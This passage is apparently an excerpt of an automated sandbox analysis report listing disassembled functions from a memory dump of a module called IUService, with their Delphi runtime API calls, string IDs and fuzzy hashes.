                                                                                                                                            • @Sysutils@Trim$qqrx20System@UnicodeString.RTL120(?,00000000,50024C6D), ref: 50024997
                                                                                                                                            • @Sysutils@AnsiPos$qqrx20System@UnicodeStringt1.RTL120(00000000,50024C6D), ref: 500249B4
                                                                                                                                            • @Sysutils@CurrentYear$qqrv.RTL120(?,?,?,00000000,50024C6D), ref: 50024AC1
                                                                                                                                            • @Sysutils@CurrentYear$qqrv.RTL120(?,?,00000000,50024C6D), ref: 50024AFA
                                                                                                                                              • Part of subcall function 50022830: GetLocalTime.KERNEL32 ref: 50022834
                                                                                                                                            • @System@Pos$qqrx20System@UnicodeStringt1.RTL120(?,?,00000000,50024C6D), ref: 50024B5C
                                                                                                                                            • @Sysutils@TryEncodeDate$qqrusususr16System@TDateTime.RTL120(?,?,?,00000000,50024C6D), ref: 50024C3D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$StringSystem@@Sysutils@$Ansi$CurrentFromPos$qqrx20Str$qqrr20Stringt1Stringx27System@%T$us$i0$%TimeYear$qqrv$Copy$qqrx20DateDate$qqrusususr16EncodeEnsureInternalLen$qqrx20LocalString$qqrr20StringiiTrim$qqrx20
                                                                                                                                            • String ID: ddd
                                                                                                                                            • API String ID: 267030927-4224823564
                                                                                                                                            • Opcode ID: 92fb4fcf5a5ca246f8cc9000afe12874db32018b39c2798d273ab4d6d16fe3e0
                                                                                                                                            • Instruction ID: 1069cb2eb66a71ff8ce87d181cf04f1ba4992945fcbd8b3ac5469d60a7480345
                                                                                                                                            • Opcode Fuzzy Hash: 92fb4fcf5a5ca246f8cc9000afe12874db32018b39c2798d273ab4d6d16fe3e0
                                                                                                                                            • Instruction Fuzzy Hash: 52A19034E0219A8ADB40DFE9E8506FEB7F4AF19300F50426AEC44E7251D774DE85CBA6
                                                                                                                                            Function 5002F51C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 5002F525
                                                                                                                                              • Part of subcall function 5002F4F0: GetProcAddress.KERNEL32(00000000), ref: 5002F509
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                            • API String ID: 1646373207-1918263038
                                                                                                                                            • Opcode ID: e06b940d9476934792f39afd65196c440aa36b4342473c26250aa0f9965bd5d2
                                                                                                                                            • Instruction ID: 68bf6f208d1ebe513e8a8dda1fcfe738442d494e70350c7787d103a1d8736fcd
                                                                                                                                            • Opcode Fuzzy Hash: e06b940d9476934792f39afd65196c440aa36b4342473c26250aa0f9965bd5d2
                                                                                                                                            • Instruction Fuzzy Hash: 37413B6558B6C74A23146BADF90343777D89AA4E94360833BF808CA282DFB87C408769
                                                                                                                                            Function 5001CA14 Relevance: 34.6, APIs: 23, Instructions: 131COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InitializeRecord$qqrpvt1.RTL120 ref: 5001CA61
                                                                                                                                              • Part of subcall function 5000AE00: @System@@InitializeArray$qqrpvt1ui.RTL120 ref: 5000AE24
                                                                                                                                            • @Sysutils@ExpandFileName$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CA78
                                                                                                                                              • Part of subcall function 5001C9D8: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000104,?), ref: 5001C9F1
                                                                                                                                              • Part of subcall function 5001C9D8: GetFullPathNameW.KERNEL32(00000000,00000104,?), ref: 5001C9F7
                                                                                                                                              • Part of subcall function 5001C9D8: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000104,?), ref: 5001CA04
                                                                                                                                            • @Sysutils@ExtractFilePath$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CA82
                                                                                                                                              • Part of subcall function 5001C610: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C61E
                                                                                                                                              • Part of subcall function 5001C610: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C62F
                                                                                                                                            • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CA8C
                                                                                                                                              • Part of subcall function 5001C8E4: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C8F2
                                                                                                                                              • Part of subcall function 5001C8E4: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C904
                                                                                                                                            • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CAA3
                                                                                                                                              • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C749
                                                                                                                                              • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C774
                                                                                                                                              • Part of subcall function 5001C70C: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C79A
                                                                                                                                            • @Sysutils@IncludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CAB4
                                                                                                                                              • Part of subcall function 500286A0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286AB
                                                                                                                                              • Part of subcall function 500286A0: @Sysutils@IsPathDelimiter$qqrx20System@UnicodeStringi.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286C5
                                                                                                                                              • Part of subcall function 500286A0: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286D5
                                                                                                                                            • @Sysutils@SameFileName$qqrx20System@UnicodeStringt1.RTL120(00000000,5001CC45), ref: 5001CAC2
                                                                                                                                              • Part of subcall function 5002889C: @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288BC
                                                                                                                                              • Part of subcall function 5002889C: @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(?,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288CA
                                                                                                                                              • Part of subcall function 5002889C: @Sysutils@CompareStr$qqrx20System@UnicodeStringt1.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288D3
                                                                                                                                            • @Sysutils@ExcludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CAFC
                                                                                                                                              • Part of subcall function 50028704: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5002870F
                                                                                                                                              • Part of subcall function 50028704: @Sysutils@IsPathDelimiter$qqrx20System@UnicodeStringi.RTL120(?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 50028729
                                                                                                                                              • Part of subcall function 50028704: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 50028748
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB0A
                                                                                                                                            • @Sysutils@ExpandFileNameCase$qqrx20System@UnicodeStringr27Sysutils@TFilenameCaseMatch.RTL120(00000000,5001CC45), ref: 5001CB1E
                                                                                                                                              • Part of subcall function 5001CA14: @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB2C
                                                                                                                                              • Part of subcall function 5001CA14: @Sysutils@IncludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB49
                                                                                                                                              • Part of subcall function 5001CA14: @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB57
                                                                                                                                            • @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(00000000,5001CC45), ref: 5001CAEA
                                                                                                                                              • Part of subcall function 5001C140: FindClose.KERNEL32(?,?,5001C10A,00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C14C
                                                                                                                                            • @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec.RTL120(00000000,5001CC45), ref: 5001CADD
                                                                                                                                              • Part of subcall function 5001C0CC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E1
                                                                                                                                              • Part of subcall function 5001C0CC: FindFirstFileW.KERNEL32(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E7
                                                                                                                                              • Part of subcall function 5001C0CC: @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C105
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CB76
                                                                                                                                            • @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CB8C
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CBB8
                                                                                                                                            • @System@@TryFinallyExit$qqrv.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CBBD
                                                                                                                                            • @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(5001CBE4,00000000,5001CC45), ref: 5001CBD7
                                                                                                                                            • @System@@FinalizeRecord$qqrpvt1.RTL120(5001CC4C), ref: 5001CC32
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$Sysutils@$System@@$String$Stringx20$Delimiter$qqrx20FileFind$Path$Asg$qqrr20Search$AnsiStringt1$Case$qqrx20Close$qqrr19Copy$qqrx20ExtractFromName$qqrx20StringiStringiiTrailing$Cat3$qqrr20Char$qqrx20ExpandFirst$qqrx20IncludeInitializeInternalLastLowerNameRecord$qqrpvt1Str$qqrr20Stringir19Stringt2Stringx27System@%T$us$i0$%$Array$qqrpvt1uiCaseCat$qqrr20CharCloseCompareDrive$qqrx20ExcludeExit$qqrvFilenameFinalizeFinallyFirstFullLen$qqrr20Length$qqrr20MatchPath$qqrx20SameStr$qqrx20StringpbiStringr27
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3647251182-0
                                                                                                                                            • Opcode ID: babfc3170ad390a3f6173a305eb4a18e5706085a47ed011bab55c1456b62137d
                                                                                                                                            • Instruction ID: 8f116e2beaebb0910c79983e48f6089e9e1a1bde4e140d13074eedb8cff09ffc
                                                                                                                                            • Opcode Fuzzy Hash: babfc3170ad390a3f6173a305eb4a18e5706085a47ed011bab55c1456b62137d
                                                                                                                                            • Instruction Fuzzy Hash: B9510734906199DBDB50DFA4DD96ACDB7B5EF49310F9082E6E808A3211DB30AF85CF80
                                                                                                                                            Function 50003454 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 277windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@FillChar$qqrpvib.RTL120 ref: 50003480
                                                                                                                                            • @System@@FillChar$qqrpvib.RTL120 ref: 50003492
                                                                                                                                            • @System@SysUnregisterExpectedMemoryLeak$qqrpv.RTL120 ref: 500034FA
                                                                                                                                            • @System@SysUnregisterExpectedMemoryLeak$qqrpv.RTL120 ref: 5000354C
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 500035B3
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 50003637
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 50003694
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 500036CD
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 500036E9
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 50003705
                                                                                                                                              • Part of subcall function 50003018: @System@Move$qqrpxvpvi.RTL120(?,?,500035CA), ref: 50003022
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 5000379C
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 50003802
                                                                                                                                            • MessageBoxA.USER32(00000000,?,50001ED0,00002010), ref: 50003829
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$CharLen$qqrpc$System@$Char$qqrpvibExpectedFillLeak$qqrpvMemoryUnregister$MessageMove$qqrpxvpvi
                                                                                                                                            • String ID: $7$<JP$jP
                                                                                                                                            • API String ID: 1068419464-4104698994
                                                                                                                                            • Opcode ID: a8bb0f9d858d0eae5a91e9caac678f446fdd161179c3f76a6e3532f1f0ec883b
                                                                                                                                            • Instruction ID: 1bd8d098dfdd9012cd56aed44c4f0c03c4dd7fa1f26bc2d498341ce450a84f99
                                                                                                                                            • Opcode Fuzzy Hash: a8bb0f9d858d0eae5a91e9caac678f446fdd161179c3f76a6e3532f1f0ec883b
                                                                                                                                            • Instruction Fuzzy Hash: 27B1E430A052D48BFB32DB6CDC90B88B7F8BB49650F9442E6E449DB352CB719D85CB91
                                                                                                                                            Function 500391B0 Relevance: 29.8, APIs: 12, Strings: 5, Instructions: 88COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391FF
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$Stringx20System@@$Asg$qqrr20Cat3$qqrr20StringStringt2
                                                                                                                                            • String ID: Any$Array $ByRef $String$UnicodeString
                                                                                                                                            • API String ID: 2201327990-2617011621
                                                                                                                                            • Opcode ID: 2c48cb2b966e9eb535af4dc705276307beba80cf27b90786bbe315e30b6060d6
                                                                                                                                            • Instruction ID: ebc111c00f9f3ce4b2f0d66ad6076afb76b8f2783d8abbf171bc1124b3b59010
                                                                                                                                            • Opcode Fuzzy Hash: 2c48cb2b966e9eb535af4dc705276307beba80cf27b90786bbe315e30b6060d6
                                                                                                                                            • Instruction Fuzzy Hash: 4E21F7347055D0AFEF12EAD8D851BDAB3DAEF9A710FA04713BA0097386C6789E01C691
                                                                                                                                            Function 50002B10 Relevance: 28.9, APIs: 19, Instructions: 407COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@SysGetMem$qqri.RTL120 ref: 50002B40
                                                                                                                                            • @System@SysFreeMem$qqrpv.RTL120 ref: 50002B58
                                                                                                                                            • @System@SysGetMem$qqri.RTL120 ref: 50002B76
                                                                                                                                            • @System@SysFreeMem$qqrpv.RTL120 ref: 50002B9C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$FreeMem$qqriMem$qqrpv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1065326172-0
                                                                                                                                            • Opcode ID: 07fe07600e9fc5acced1606dc5d0384102eb1ac5b07c89382bdbf1b765f8db2c
                                                                                                                                            • Instruction ID: 109219bf6a90ecac94eeb607d3392a2891908dbfbfbb0241e4c678e92fbbb21d
                                                                                                                                            • Opcode Fuzzy Hash: 07fe07600e9fc5acced1606dc5d0384102eb1ac5b07c89382bdbf1b765f8db2c
                                                                                                                                            • Instruction Fuzzy Hash: 48C10762700A814BF7159ABC9CA57ADB3D19BD4221F98833EE614CB396DAB4EC458381
                                                                                                                                            Function 5001D12C Relevance: 28.6, APIs: 19, Instructions: 137COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D15E
                                                                                                                                            • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(?,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D16C
                                                                                                                                            • @Sysutils@SameFileName$qqrx20System@UnicodeStringt1.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D175
                                                                                                                                            • @System@UniqueString$qqrr20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D18F
                                                                                                                                            • @System@UniqueString$qqrr20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D1A2
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D1EA
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D1F8
                                                                                                                                            • @Sysutils@SameFileName$qqrx20System@UnicodeStringt1.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D201
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D20E
                                                                                                                                            • @System@@UStrCatN$qqrv.RTL120(5001D2FC,5001D2E8,00000004,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D22C
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000004,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D250
                                                                                                                                            • @System@@UStrCatN$qqrv.RTL120(5001D2FC,?,00000004,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D264
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D275
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D27F
                                                                                                                                              • Part of subcall function 5001D100: @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000004,?,5001D1B5,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D110
                                                                                                                                            • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D28A
                                                                                                                                              • Part of subcall function 5001C8E4: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C8F2
                                                                                                                                              • Part of subcall function 5001C8E4: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C904
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D294
                                                                                                                                              • Part of subcall function 5000A164: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                                                              • Part of subcall function 5000A164: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                                                              • Part of subcall function 5000A164: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                                                              • Part of subcall function 5000A164: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                                                            Memory Dump Source
